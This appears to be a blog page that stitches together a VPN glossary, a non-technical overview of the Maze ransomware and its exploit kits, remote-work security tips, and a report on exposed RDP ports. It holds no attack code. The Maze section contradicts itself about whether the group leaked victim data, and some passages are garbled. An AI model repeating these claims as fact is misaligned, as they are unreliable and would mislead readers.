Category: Uncategorized

A array of tech terms that comes in to picture. When a word VPN arises. Let’s see them one by one

A virtual private network is a way of connecting to the internet in a more secure or private way, by sending your data through an encrypted tunnel and hiding your true IP address — making it harder for someone to track your online activity.

When deciding on a new VPN service, the following terms can help you navigate the field and understand what a provider offers.

Encryption
Using an algorithm to securely encode data so that it appears like random, digitally illegible information. Once your encrypted data reaches its destination, a cipher is used to decrypt it. There are multiple types of encryption used by VPNs, which vary in strength. Popular algorithms is AES -256.

Geo blocking
The process of blocking access to online content, or restricting that content to certain locations. One measurement of a VPN’s strength is its ability to circumvent the geo blocking practices of streaming services like Netflix and Hulu so you can access the content you’ve paid for, no matter what country you travel to.

IP Count
The number of IP addresses used by a VPN provider. VPNs that have a larger supply of IP addresses can offer higher speeds to individual users. Those with a smaller number of IP addresses may offer slower speeds to users.

Jurisdiction
The country in which a VPN provider is headquartered, and to whose laws it must adhere. This all about privacy laws and terms.

Kill switch
A must-have feature offered by most VPNs that kills your internet connection if your VPN connection is dropped for any reason, in order to prevent your data from suddenly becoming visible to others.

Leak
When a VPN service fails in some way, and exposes what could be personally identifying information or unencrypted user data to either a website, network members or an internet service provider. During its review process, CNET tests VPNs for the following types of leaks: IPv4, IPv6, DNS and WebRTC.

Logs
There are two kinds of logs a VPN provider might keep — connection logs and usage logs.

Obfuscation
The act of making internet traffic passed through a VPN look like regular, non-VPN internet traffic. This is important in countries where VPN use is outlawed, but it is also key to accessing some streaming services and websites that bar VPN use.

Perfect Forward Secrecy
A widely hailed encryption function that uses one of two established key exchanges to create an additional level of security. A good VPN uses Perfect Forward Secrecy to ensure that any stolen encryption keys can’t be used to decrypt past or future internet sessions.

Proxy Service
Often used to get around content geo blocking, a proxy service can hide your real IP address by getting in between your IP address and the website you’re trying to access and making you appear as though your IP address is one of its own. Proxies are usually not encrypted.

Server count
The number of servers maintained in a VPN’s network. A larger number of servers in a larger number of locations is often a strong indicator of increased speeds.

Split-tunneling
Creating two kinds of VPN tunnels at once, sometimes using different methods. Often, one VPN tunnel will be used to protect the internet activity you create in your browser, while another will be used to protect the internet activity created by internet-connected apps on your phone or computer.

Tor
An abbreviation for The Onion Router, or The Tor Network. Tor is designed to allow completely anonymous communication on the internet by encrypting your data and bouncing it off of several volunteer-run receiving points called “nodes.”h6

A small write up on Maze that gets the fame light in recent times. Traditional but it’s powerful when compared to others

What is Maze?
Maze, also known as ChaCha, is ransomware that was first observed in May 2019. At first, Maze was a rather unremarkable instance of ransomware that was involved in extortion campaigns. Beginning around October of 2019, Maze became more aggressive and more public.

Going a step beyond nearly any malware ever seen, in November of 2019 Maze began publicly outing their campaign victims by posting the names of the companies that have not complied with their ransom demands. Attack campaigns employing Maze typically pose as legitimate government agencies and security vendors to steal and encrypt data to then attempt to extort the data owner.

Maze is used as a part of a multi-pronged cyberattack. Generally speaking, Maze is observed appearing in the second or third step of these campaigns and is less likely to be used as an initial access technique.

What makes Maze different from other ransomware?

Maze’s functionality far exceeds this traditional ransomware approach by using a 1-2-3 combination of:

Encrypt
Exfiltrate
Extort

When comparing Maze to most of the other ransomware out there, the clear difference is its abilities to both exfiltrate the encrypted data and extort the victim. The end result of this is the ability to hit victims with what has been described as a ransomware “double whammy” — whereas most ransomware mere encrypts local victim data, Maze can apply more pressure to victims by threatening to leak sensitive data.

This threat should be taken seriously, as Trend Micro researchers have noted that attack groups using Maze have made good on this threat and indeed released sensitive victim information to the public via “name and shame” websites. Occurring in mid-December of 2019, this leaking entailed posting documents and raw databases belonging to noncompliant victims.

How does Maze work?
Ransomware only needs to gain entry to a system to work, gaining this entry is far more than the proverbial “half the battle” and more like the battle itself.

Unlike other ransomware that typically uses social engineering and spam email campaigns to gain entry to a targeted system, Maze uses exploit kits via drive-by downloads. As you know, exploit kits are a compilation of known software vulnerabilities that, taken as a whole, serve as an all-in-one exploit tool kit.

One of the exploit kits Maze uses is called Fallout, which uses various exploits found on GitHub. One of these vulnerabilities is a Flash Player exploit, CVE-2018-15982. Fallout is a relatively new exploit kit that uses PowerShell instead of the web browser to run its payload. Maze has also been observed using Spelevo, another exploit kit.

For some unknown reason, the Maze group did not make good on its threat to publish sensitive information and posted the list of leak data and hosts to serve as proof of the attack. This is beyond uncommon for a ransomware attack.
Stay home, stay safe

Conclusion
Ransomware has been around for a few years now and we are starting to see instances of this type of malware that break the mold and forge a new direction. Maze differs from other ransomware in many significant ways — from its capabilities to the heart of the ransomware attack itself, gaining entry.

• Beware of Insecure Wi-Fi
• Refresh Phishing Warnings and Employee Trainings
• Limit Access to Games and Websites on Devices Used to Access Employer Systems
• Keep Track of Devices and Secure Physical Work Spaces
• Prevent External Device Attachment
• Formalize Work-From-Home
• repare an Incident Response Plan
• Encrypt Data and Tightly Control Access to Encrypted Data.
• Deploy Secure Devices to Remote Employees.
• Enhance VPN Security, Password Strength, and Telephone/Video Conference PProtection

The coronavirus could make remote work the norm, what businesses need to know
Microsoft has warned of the risks associated with allowing remote access to desktop services while working from home, publishing guidance on how IT teams can maintain secure working environments when faced with an increase in remote connections.

It said there has been an increase in the number of systems accessible via the traditional Remote Desktop Protocol (RDP) port and a well-known “alternative” port used for RDP.

Although Remote Desktop Services (RDS) can be a fast way to enable remote access for employees, there are a number of security challenges that need to be considered .

The rapid outbreak of COVID-19 and the resulting lockdowns meant many businesses were unable to prepare for the demands remote working would place on IT teams and technical resources.

Ringold said that companies that were forced to quickly find means of allowing employees to access work networks may have relied on the default RDP, potentially leaving corporate networks and applications vulnerable.

Research from IoT search engine Shodan suggests that this has resulted in an increase in the number of systems accessible via both the standard RDP as well as the ‘alternate’ 3388 port in March, both of which can be exploited fairly easily by hackers if exposed.

The risk is even higher when providing administrators with access to on-premises systems, owing to the fact they have much higher access privileges that can go to network and operating system-level.

According to Microsoft, various considerations should be made when offering remote desktop access to employees, including reviewing firewall policies to access whether any systems are directly exposed to public internet; controlling and logging remote access by employees; implementing multi-factor authentication and assessing whether a it would be possible for a hacker to move laterally through a corporate network once they gained access.

Ultimately, considerations for remote access should be weighed against businesses’ own cybersecurity resilience and risk appetite, Ringold said.

“Leveraging remote desktop services offers great flexibility by enabling remote workers to have an experience like that of working in the office, while offering some separation from threats on the endpoints.

“At the same time, those benefits should be weighed against the potential threats to the corporate infrastructure. Regardless of the remote access implementation your organization uses, it is imperative that you implement best practices around protecting identities and minimizing attack surface to ensure new risks are not introduced.”

Microsoft said to identify whether your company is using RDP, they should perform an audit and review of firewall policies and scan internet-exposed address ranges and cloud services they use, to uncover any exposed systems. Firewall rules may be labeled as “Remote Desktop” or “Terminal Services.” The default port for Remote Desktop Services is TCP 3389, but sometimes an alternate port of TCP 3388 might be used if the default configuration has been changed.